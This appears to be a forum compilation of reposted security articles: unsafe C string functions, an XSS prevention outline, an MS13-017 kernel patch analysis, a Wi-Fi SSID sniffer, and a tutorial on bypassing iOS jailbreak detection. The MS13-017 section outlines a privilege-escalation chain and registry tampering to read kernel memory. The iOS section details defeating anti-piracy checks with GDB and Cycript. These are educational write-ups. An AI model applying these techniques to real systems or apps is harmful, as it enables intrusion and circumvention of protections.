Stop using strncpy already!

Posted on April 3, 2013 by brucedawson

I keep running into code that uses strcpy, sprintf, strncpy, _snprintf (Microsoft only), wcsncpy, swprintf, and morally equivalent functions. Please stop. There are alternatives which are far safer, and they actually require less typing.

The dangers of strcpy and sprintf should require little explanation, I hope. Neither function lets you specify the size of the output buffer, so buffer overruns are often a risk. Using strcpy to copy data from network packets or to copy a large array into a smaller one are particularly dangerous, but even when you're certain that the string will fit, it's really not worth the risk.

'n' functions considered dangerous

The dangers of strncpy, _snprintf, and wcsncpy should be equally well known, but apparently they are not. These functions let you specify the size of the buffer but – and this is really important – they do not guarantee null-termination. If you ask these functions to write more characters than will fill the buffer then they will stop – thus avoiding the buffer overrun – but they will not null-terminate the buffer. In order to use these functions correctly you have to do this sort of nonsense:

[INDENT]char buffer[5];
strncpy(buffer, "Thisisalongstring", sizeof(buffer));
buffer[sizeof(buffer)-1] = 0;
[/INDENT]

A non-terminated string in C/C++ is a time-bomb just waiting to destroy your code. My understanding is that strncpy was designed for inserting text into the middle of strings, and then was repurposed for 'secure' coding even though it is a terrible fit. Meanwhile _snprintf followed the strncpy pattern, but snprintf did not. That is, snprintf guarantees null-termination, but strncpy and _snprintf do not. Is it any wonder that developers get confused? Is it any wonder that developers often do this:

[INDENT]// Make snprintf available on Windows:
// Don't ever do this! These two functions are different!
#define snprintf _snprintf
[/INDENT]

strlcpy and lstrcpy

strlcpy is designed to solve the null-termination problems – it always null-terminates. It's certainly an improvement over strncpy, however it isn't natively available in VC++. lstrcpy is a similarly named Microsoft design defect that appears to behave like strlcpy but is actually a security bug. It uses structured exception handling to catch access violations and then return, so in some situations it will cover up crashes and give you a non-terminated buffer. Awesome.

Wide characters worse?

swprintf is a function that defies prediction. It lacks an 'n' in its name but it takes a character count, yet it doesn't guarantee null-termination. It's enough to make one's head explode.

Where's the pattern?

If you find the list below obvious or easy to remember then you may be a prodigy, or a liar:

May overrun the buffer: strcpy, sprintf
Sometimes null-terminates: strncpy, _snprintf, swprintf, wcsncpy, lstrcpy
Always null-terminates: snprintf, strlcpy

The documentation for these functions (man pages, MSDN) is typically pretty weak. I want bold letters at the top telling me whether it will null-terminate, but it typically takes a lot of very careful reading to be sure. It's usually faster to write a test program. It's also worth emphasizing that of the seven functions listed above only one is even plausibly safe to use. And it's not great either.

More typing means more errors

But wait, it's actually worse. Because it turns out that programmers are imperfect human beings, and therefore programmers sometimes pass the wrong buffer size. Not often – probably not much more than one percent of the time – but these mistakes definitely happen, and 'being careful' doesn't actually help. I've seen developers pass hard-coded constants (the wrong ones), pass named constants (the wrong ones), use sizeof(the wrong buffer), or use sizeof on a wchar_t array (thus getting a byte count instead of a character count).
I even saw one piece of code where the address of the string was passed instead of the size, and due to a mixture of templates and casting it actually compiled! Passing sizeof() to a function that expects a character count is the most common failure, but they all happen – even snprintf and strlcpy are misused. Using annotations and /analyze can help catch these problems, but we can do so much better.

The solution is…

We are programmers, are we not? If the functions we are given to deal with strings are difficult to use correctly then we should write new ones. And it turns out it is easy. Here I present to you the safest way to copy a string to an array:

[INDENT]template <size_t charCount>
void strcpy_safe(char (&output)[charCount], const char* pSrc)
{
    // Copy the string – don't copy too many bytes.
    strncpy(output, pSrc, charCount);
    // Ensure null-termination.
    output[charCount - 1] = 0;
}

// Call it like this:
char buffer[5];
strcpy_safe(buffer, "Thisisalongstring");
[/INDENT]

I challenge you to use this function incorrectly. You can make it crash by passing an invalid source pointer, but in many years of using this technique I have never seen a case where the buffer size was not inferred correctly. If you pass a pointer as the destination then, because the size cannot be inferred, the code will fail to compile. I think that strcpy_safe is (ahem) a perfect function. It is either used correctly, or it fails to compile. It. Is. Perfect. And it's only six lines. Five if you indent like K&R.

Because strcpy_safe is so tiny – it just calls strncpy and then stores a zero – it will inline automatically in VC++ and should generate identical code to if you manually called strncpy and then null-terminated. If you want gcc to inline it you will need __attribute__((always_inline)). Either way, if you want to reduce code size further you could write a non-inline helper function (strlcpy?) that would do the null-termination and have strcpy_safe call this function. It's up to you.
One could certainly debate the name – maybe you would rather call it acme_strcpy, or acme_strncpy_safe. I really don't care. You could even call it strcpy and let template overloading magically improve the safety of your code.

Extrapolation

Similar wrappers can obviously be made for all of the string functions that you use. You can even invent new ones, like sprintf_cat_safe. In fact, when I write a member function that takes a pointer and a size I usually make it private and write a template wrapper to handle the size. It's a versatile technique that you should get used to using. Templates aren't just for writing unreadable meta-code.

String classes

Yes, to be clear, I am aware of the existence of std::string. For better or for worse most game developers try to avoid dynamically allocated memory, and std::string generally implies just that. There are (somewhat) valid reasons to use string buffers, even if those valid reasons are just that you've been handed a million lines of legacy code with security and reliability problems in all directions.

Summary

We started with this code – two lines of error-prone verbosity:

[INDENT]strncpy(buffer, "Thisisalongstring", sizeof(buffer));
buffer[sizeof(buffer)-1] = 0;
[/INDENT]

We ended with this code – simpler, and impossible to get wrong:

[INDENT]strcpy_safe(buffer, "Thisisalongstring");
[/INDENT]

You should be using the second option, or explain to me why the heck not. It is constructive laziness of the highest order. Doing less typing in order to create code that is less fragile seems like it just might be a good idea.

Sursa: Stop using strncpy already! | Random ASCII
-
[h=1]XSS (Cross Site Scripting) Prevention Cheat Sheet[/h]

[h=2]Contents[/h]

1 Introduction
1.1 A Positive XSS Prevention Model
1.2 Why Can't I Just HTML Entity Encode Untrusted Data?
1.3 You Need a Security Encoding Library
2 XSS Prevention Rules
2.1 RULE #0 - Never Insert Untrusted Data Except in Allowed Locations
2.2 RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content
2.3 RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes
2.4 RULE #3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values
2.4.1 RULE #3.1 - HTML escape JSON values in an HTML context and read the data with JSON.parse
2.5 RULE #4 - CSS Escape And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values
2.6 RULE #5 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values
2.7 RULE #6 - Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way
2.8 RULE #7 - Prevent DOM-based XSS
2.9 Bonus Rule: Use HTTPOnly cookie flag
3 XSS Prevention Rules Summary
4 Output Encoding Rules Summary
5 Related Articles
6 Authors and Primary Editors
7 Other Cheatsheets

Link: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
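For a concrete feel of Rule #1's HTML entity encoding, here is a minimal sketch using Python's html.escape as a stand-in for a proper security encoding library (the cheat sheet itself recommends using a dedicated library rather than rolling your own):

```python
from html import escape

# Untrusted data, e.g. straight from a request parameter.
user_input = '<script>alert("xss")</script>'

# quote=True also encodes quote characters, so the result is safe
# inside quoted HTML attributes as well as element content.
safe = escape(user_input, quote=True)
```

The dangerous characters (&, <, >, ", ') become HTML entities, so the browser renders them as text instead of parsing them as markup.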
-
[h=2]MS13-017 – The harmless silent patch…[/h]

Hi, in this blog post I'm going to discuss a silent patch published by Microsoft on 12th February 2013 (Microsoft Security Bulletin MS13-017 - Important: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2799494)). Even though this bug was patched the previous patch Tuesday, I think that it is interesting to analyze and show the relationship between the ROM BIOS and Windows.

[h=2]Diffing the Patch:[/h]

According to the Microsoft description, we are told that 3 vulnerabilities were addressed by this patch:

Kernel Race Condition Vulnerability – CVE-2013-1278
Kernel Race Condition Vulnerability – CVE-2013-1279
Windows Kernel Reference Count Vulnerability – CVE-2013-1280

The files that were modified are "ntoskrnl.exe" and "ntkrnlpa.exe". In general, I always analyze the changes between Windows XP and Windows 7, because the changed functions aren't always the same. When I did the binary diffing in Windows XP (and also in Windows 2003) between the vulnerable version of "ntkrnlpa.exe" (5.1.2600.6284) and the patched version of "ntkrnlpa.exe" (5.1.2600.6335), I only found one change: the "VdmpInitialize" function. After looking at the binary diffing results and analyzing the changes made in this function, I realized that it was very different from what Microsoft reported…

[h=2]The changed function:[/h]

As I said before, the changed function is "VdmpInitialize". This function is called when the "ntvdm.exe" process is invoked by the operating system, which happens when a 16-bit application is executed by a user. Essentially, this function is responsible for mapping part of the ROM BIOS in user space, into the first megabyte of the "ntvdm.exe" process memory, creating the right context for a 16-bit process. When a 16-bit process calls BIOS interrupts, the ROM BIOS code (now in user-space memory) is executed.
An interesting detail is that the memory copied by the "VdmpInitialize" function is really the memory mapped in the physical address space between c000:0000 and f000:ffff. This means that if the mapped code located at this memory address were modified, for example by a rootkit, it could be executed by a 16-bit application when it is launched.

[h=2]The bug:[/h]

The vulnerability is linked to a Windows registry key called "Configuration Data", located in "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System". This key is used by the Windows kernel through the "VdmpInitialize" function. Looking at the key value through the "Modify Binary Data" option in regedit, we can see a list of value pairs representing ADDRESS – LENGTH. Among some values, we can see this:

VGA ROM:
00 00 0C 00 –> 0x000C0000 (BLOCK ADDRESS)
00 80 00 00 –> 0x00008000 (BLOCK LENGTH)

ROM BIOS:
00 00 0F 00 –> 0x000F0000 (BLOCK ADDRESS)
00 00 01 00 –> 0x00010000 (BLOCK LENGTH)

These values are loaded by the "VdmpInitialize" function, which finishes the process by copying data from PHYSICAL MEMORY (only accessible by the kernel) to the memory space of the "ntvdm.exe" process. The destination address of the copied data is the same as the original ROM BIOS address, but the difference is that it's virtual memory, NOT PHYSICAL MEMORY. As an example, we can see how the key values are used as parameters to copy memory from the VGA ROM BIOS:

–> memcpy (0xc0000, SOME_VIRTUAL_ADDRESS, 0x8000);

Now, if we look at part of the patched function code, we can see that the comparison "if (_VdmMapBiosRomReadWrite == 1)" was moved. In the patched function, the code checks:

- if (BLOCK ADDRESS >= BASE_ROM_BIOS_ADDRESS (0xc0000))
- if (BASE_ROM_BIOS_ADDRESS – BLOCK ADDRESS > BLOCK ADDRESS)

If all is OK, the comparison "if (_VdmMapBiosRomReadWrite == 1)" is executed.
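As a side note, the ADDRESS/LENGTH pairs shown above are plain little-endian dwords, so decoding a dump of them is trivial. The byte string below simply reproduces the four values listed (offsets within the real "Configuration Data" blob will differ):

```python
import struct

# Raw bytes as listed above: VGA ROM pair followed by ROM BIOS pair.
raw = bytes.fromhex("00000c0000800000"   # 0x000C0000, 0x00008000
                    "00000f0000000100")  # 0x000F0000, 0x00010000

# Walk the blob in 8-byte strides: each stride is (address, length).
pairs = [struct.unpack_from("<II", raw, off) for off in range(0, len(raw), 8)]
```

Swapping one of the address dwords for a kernel address (and/or enlarging a length) is exactly the registry tampering the article describes.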
In the unpatched function, the same checks exist, but they are only executed when the condition "if (_VdmMapBiosRomReadWrite == 1)" is TRUE, because the "IF" statement is in the wrong place. So, if that comparison fails, the checks will never be made. At least in my virtual machine, the value of the variable "_VdmMapBiosRomReadWrite" is FALSE.

The interesting detail is not exactly this bug, but rather what the "VdmpInitialize" function does. Remember that "VdmpInitialize" uses value pairs (BLOCK ADDRESS – BLOCK LENGTH) to build the ntvdm.exe memory context, and these value pairs are located in the Windows registry, so they can be modified. We can change the BLOCK ADDRESS value in the registry key and the function will read physical memory from another area. For example, we could read some parts of the Windows KERNEL and map them into USER-space memory, in this case into the "ntvdm.exe" process. On the other hand, if we change the LENGTH of the data to copy, we could read large quantities of physical memory.

Now, the only way to change the registry key value (unless I'm missing something) is as an administrator user, which makes the bug somewhat unattractive, because if we are an administrator user, why would we need more?

[h=2]ROM BIOS and Windows:[/h]

Apparently, this bug doesn't represent any problem for users, but access to the PHYSICAL MEMORY where the ROM BIOS is mapped has deeper implications. A year ago, VMware published an advisory called "VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation" (Microsoft Windows and VMware ESXi/ESX CVE-2012-1515 Local Privilege Escalation Vulnerability). In summary, the vulnerability patched by VMware allowed the virtual machine's ROM BIOS memory area to be modified at runtime, ending with a privilege-escalation exploit within the virtual machine.
If the ROM BIOS is modified (in this case it could be the VGA ROM BIOS), the malicious code could be executed by calling interrupt number 0x10 (INT 10h). In Windows XP/Windows 2003, BIOS interrupt 10h can be invoked from a Windows console by changing the video mode to FULL-SCREEN. A possible result is malicious code running in VM86 mode (Virtual 8086 mode) within the CSRSS.EXE process.

Now, according to the VMware advisory and the tests that I carried out myself, it's possible to escape from VM86 mode by overwriting a table called "VDM TIB", located at memory address 1200h:0000h (linear address 0x12000).

The complete exploitation process could be:

Through a bug, overwrite the memory area where the ROM BIOS is mapped (we could use the "INT 10h" handler). Modifying part of the CSRSS.EXE process memory can produce the same results (only Windows XP/Windows 2003).
Invoke the "INT 10h" handler by changing the console video mode to FULL-SCREEN.
Running in VM86 mode within the CSRSS process, modify the VDM TIB structure.
When "INT 10h" returns, take control of the CSRSS.EXE process by jumping to 32-bit code.

[h=2]Final thoughts:[/h]

Microsoft decided not to talk about this function and not to assign a CVE for this vulnerability, maybe because they determined that it is not a security vulnerability. However, they decided to patch the function; I suppose there must have been a reason – if anyone has any theories I would love to hear them.

- Nicolas Economou, Senior Exploit Writer, CORE Labs

Sursa: MS13-017 - The harmless silent patch... | Core Security
-
[h=1]Wi-Fi SSID Sniffer in 11 Lines of Python using Raw Sockets[/h]

Published 03.04.2013

Full information and source code download link: [Hack Of The Day Ep. 10] Wlan Ssid Sniffer Using Raw Sockets In Python

Please post comments on the link above so we can respond to them. Thanks!

If you are interested in learning how to use Python for Pentesting, please have a look at our course, taken by students from 73+ countries as of this writing: http://securitytube-training.com/cert...
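The sniffer in the episode reads raw 802.11 frames and pulls the SSID out of beacon tagged parameters. The parsing step can be sketched roughly as below; the offsets assume a bare beacon frame with no radiotap header (real captures usually carry one, whose length varies by driver), so treat this as an illustration rather than a drop-in replacement for the episode's code:

```python
def ssid_from_beacon(frame):
    """Extract the SSID from a raw 802.11 beacon frame (no radiotap header).

    Beacon layout: 24-byte MAC header, 12 bytes of fixed parameters
    (timestamp, beacon interval, capabilities), then tagged parameters,
    where tag number 0 is the SSID parameter set.
    """
    # Frame control byte 0x80 = management frame (type 0), beacon (subtype 8).
    if not frame or frame[0] != 0x80:
        return None
    tags = frame[24 + 12:]
    while len(tags) >= 2:
        tag_id, tag_len = tags[0], tags[1]
        if tag_id == 0:  # SSID parameter set
            return tags[2:2 + tag_len].decode(errors="replace")
        tags = tags[2 + tag_len:]
    return None
```

On Linux, frames would be read from a raw socket bound to a monitor-mode interface, e.g. socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003)), which requires root.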
-
[h=1]Security Engineering — The Book[/h] The first edition (2001) You can also download all of the first edition for free: The foreword, preface and other front matter What is Security Engineering? Protocols Passwords Access Control Cryptography Distributed Systems Multilevel Security Multilateral Security Banking and Bookkeeping Monitoring Systems Nuclear Command and Control Security Printing and Seals Biometrics Physical Tamper Resistance Emission Security Electronic and Information Warfare Telecom System Security Network Attack and Defense Protecting E-Commerce Systems Copyright and Privacy Protection E-Policy Management Issues System Evaluation and Assurance Conclusions Bibliography Finally, here's a single pdf of the whole book. It's 17Mb, but a number of people asked me for it. All chapters from the second edition now available free online! Table of contents Preface Acknowledgements Chapter 1: What is Security Engineering? Chapter 2: Usability and Psychology Chapter 3: Protocols Chapter 4: Access Control Chapter 5: Cryptography Chapter 6: Distributed Systems Chapter 7: Economics Chapter 8: Multilevel Security Chapter 9: Multilateral Security Chapter 10: Banking and Bookkeeping Chapter 11: Physical Protection Chapter 12: Monitoring and Metering Chapter 13: Nuclear Command and Control Chapter 14: Security Printing and Seals Chapter 15: Biometrics Chapter 16: Physical Tamper Resistance Chapter 17: Emission Security Chapter 18: API Security Chapter 19: Electronic and Information Warfare Chapter 20: Telecom System Security Chapter 21: Network Attack and Defence Chapter 22: Copyright and DRM Chapter 23: The Bleeding Edge Chapter 24: Terror, Justice and Freedom Chapter 25: Managing the Development of Secure Systems Chapter 26: System Evaluation and Assurance Chapter 27: Conclusions Bibliography Index Sursa: Security Engineering - A Guide to Building Dependable Distributed Systems
-
Bypassing Jailbroken Checks in iOS Applications using GDB and Cycript

I've been teaching iOS Application Security and Auditing to pentesters and developers (secure programming guidelines), online and in the real world, and one of the questions which always comes up is: can anti-piracy measures work if implemented in the application? Pentesters want to know if they could run into problems with applications implementing runtime protections. Developers, on the other hand, want to know if they can sleep well if they implement such protections.

The short answer is NO. If your code runs on a platform controlled by the attacker, and if he is skilled enough, he will eventually figure out how to subvert your protection. This is especially true for a jailbroken device, where the attacker can pretty much run anything. I can already see pentesters smiling. If you know how to do runtime analysis using Cycript and GDB, then you should be able to subvert most protections. However, as this is significantly different from other application pentests (web and network) and involves a component of reverse engineering an application on the ARM platform, this might get interesting and challenging!

This blog post is the first in a series in which I plan to cover the common techniques used by developers today to check for jailbreaking, and how an attacker could subvert them. In order to try things out, we need a sample application! I've created a simple AntiPiracyDemo application for iOS which I use for my online iOS course. You can download the IPA here. Please note that this is a self-signed application and requires a jailbroken device (iPhone/iPad) to run. You can install the application using installipa as shown below:

The application has been tested on iOS 5.1.1 and 6.1.2. Once you run the application, you are confronted with a simple screen to check for the jailbroken state. Clicking on the button confirms this application is running on a jailbroken phone.
The developer of a real-world application could now exit, or send a report (privacy violation?) back to his server as notification.

Objective: To bypass the isJailbroken check implemented by the iOS application.

Step 1: Find the application PID and the directory in which it is installed. This is easy to do using "ps" along with a "grep" for the application name.

Step 2: Go to the application directory and locate the actual application binary.

Step 3: Native iOS applications are written in Objective-C, which is a dynamically typed language. This requires that all the class information be available at runtime, and hence it is embedded into the binary. We can extract this class information using a tool called class-dump-z, as shown below.

Step 4: View the class information file – there is a ton of information in there!

Step 5: We need to find the rootViewController for the current window. This can be done using a tool called Cycript, which uses Mobile Substrate to hook into any running application.

Step 6: Let's go back to the output of class-dump-z in Step 4 and find the "@interface" section for AntiPiracyViewController.

Step 7: We see a "checkPiracy" method and, more interestingly, a method called "isJailbroken" which returns a BOOL and takes no inputs – which probably means it checks for the jailbroken state.

We can use 2 different techniques to bypass this protection:

1. Runtime modification using GDB
2. Method swizzling using Cycript

Let's take up runtime modification using GDB first.

Step 1: Attach GDB to AntiPiracyDemo using the PID.

Step 2: Set a breakpoint on isJailbroken.

Step 3: Continue running the application and then click on the "Am I Pirated" button to see if we hit the breakpoint.

Step 4: Disassemble! Be prepared for some unfamiliar-looking symbols if ARM assembly is not your thing.

Step 5: iOS devices have an ARM-based processor, and what you are seeing is ARM assembly.
If you are from the x86 world, then there is only one thing you need to keep in mind when working with ARM assembly: the first four arguments are passed via the registers R0, R1, R2, R3. More than 4 arguments are passed on the stack. Here is the ABI document if you are interested.

Step 6: In the disassembly in Step 4, you see a lot of "blx 0x98fe4 <dyld_stub_objc_msgSend>". BLX is "Branch with Link and Exchange", which basically ends up calling objc_msgSend, which has the following definition (the above is from the Apple Developer site). objc_msgSend is really the "carrier" of all messages inside an iOS application. Using the ABI we can conclude that:

theReceiver is pointed to by R0
theSelector is pointed to by R1
The first argument is pointed to by R2

Step 7: We could set a breakpoint on objc_msgSend itself, but I would prefer to add breakpoints at all the locations where it is called, to better illustrate the concept. So, let's set the breakpoints.

Step 8: Let's continue running the application and dump R0/R1 when we hit Breakpoint 2. This will help us understand the receiver of the message and its respective selector. NSString alloc is not interesting; let's repeat the same for the other breakpoints. Below is the output when we hit Breakpoints 4 and 5. Breakpoint 4 tells us that the application is using NSFileManager, and Breakpoint 5 tells us it is checking "fileExistsAtPath:" for "/private/var/lib/apt". Very interesting! APT is probably one of the first binaries to be installed on a jailbroken phone, to manage packages from Cydia. Looks like the developer is checking for the presence of this binary.

Step 9: So where do we go from here? The return value is stored in R0, and if you check the documentation of NSFileManager's fileExistsAtPath: it returns a BOOL. This means "0" will be returned if the device is NOT jailbroken and "1" will be returned if it IS jailbroken. In our case, as our iPhone is jailbroken, it will return "1".
We can verify this by setting a breakpoint on the next line of code and checking the value of R0, as below.

Step 10: The easiest way to subvert this mechanism is to change the value of R0 from "1" to "0", so that it indicates to the application that APT does not exist and hence the device is not jailbroken. We can do this very easily.

Step 11: If we check the application now, it happily tells us that "This iPhone is NOT Jailbroken". Of course, we have not patched the check in the binary, so you would need to do this every time. I will take up application patching in another blog post.

Now let us look at the other technique: method swizzling using Cycript.

Step 1: Attach to the application using Cycript.

Step 2: Method swizzling allows you to change the mapping of a given method to your own implementation of it. To get the list of messages available, we use isa.messages. This command should give you a ton of output! You can clearly see isJailbroken in it, as highlighted.

What really is isa.messages? If you look at the Objective-C runtime implementation (runtime.h), isa is really a pointer to the class structure itself. isa is never exposed to the programmer directly, but with Cycript we are able to access it. Quoting from Apple's website:

If you're a procedural programmer new to object-oriented concepts, it might help at first to think of an object as essentially a structure with functions associated with it. This notion is not too far off the reality, particularly in terms of runtime implementation. Every Objective-C object hides a data structure whose first member—or instance variable—is the isa pointer. (Most remaining members are defined by the object's class and superclasses.)
The class object maintains a dispatch table consisting essentially of pointers to the methods it implements; it also holds a pointer to its superclass, which has its own dispatch table and superclass pointer. Through this chain of references, an object has access to the method implementations of its class and all its superclasses (as well as all inherited public and protected instance variables). The isa pointer is critical to the message-dispatch mechanism and to the dynamism of Cocoa objects.

Please read the rest here: https://developer.apple.com/library/mac/#documentation/Cocoa/Conceptual/CocoaFundamentals/CocoaObjects/CocoaObjects.html

The last line of the above excerpt summarizes the importance of isa in message dispatching. Here is more information on it:

The key to messaging lies in the structures that the compiler builds for each class and object. Every class structure includes these two essential elements: a pointer to the superclass, and a class dispatch table. This table has entries that associate method selectors with the class-specific addresses of the methods they identify.

Full details here: https://developer.apple.com/library/mac/#documentation/Cocoa/Conceptual/ObjCRuntimeGuide/Articles/ocrtHowMessagingWorks.html

Step 3: It's OK if the above does not make any sense, but it's good to know what is really happening in the background. Now let's change the implementation of isJailbroken with Cycript.

Step 4: Now when you click on "Am I Pirated?" you will always get a "NO". W00t!

Hope you enjoyed this post. I will be creating more posts on bypassing other checks, like binary checks, bundle and hash checks, etc. Stay tuned! If you are interested in learning how to methodically understand many of the above concepts and test iOS applications with a blackbox approach, then please have a look at my SecurityTube iOS Security Expert (SISE) course, an online course and certification which focuses on the iOS platform and application security.
This course is ideal for pentesters, researchers and the casual iOS enthusiast who would like to dive deep and understand how to analyze and systematically audit applications on this platform using a variety of bleeding edge tools and technique. Posted by Vivek Ramachandran Sursa: SecurityTube.net Hack of the Day: Bypassing Jailbroken Checks in iOS Applications using GDB and Cycript
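As a footnote to the swizzling technique above: conceptually, what Cycript does is rebind the selector's entry in the class dispatch table to a new implementation. The same idea can be expressed as a Python analogy (illustrative only; Objective-C dispatch is not Python attribute lookup):

```python
class PiracyCheck:
    """Stand-in for the app's view controller with the jailbreak check."""

    def is_jailbroken(self):
        return True  # original implementation: the device IS jailbroken

# Rebind the method on the class, just as the Cycript swizzle rebinds
# the isJailbroken selector; every subsequent call hits the replacement.
PiracyCheck.is_jailbroken = lambda self: False

check = PiracyCheck()
result = check.is_jailbroken()
```

After the rebinding, every instance answers "not jailbroken", which is exactly the effect seen in Step 4 above.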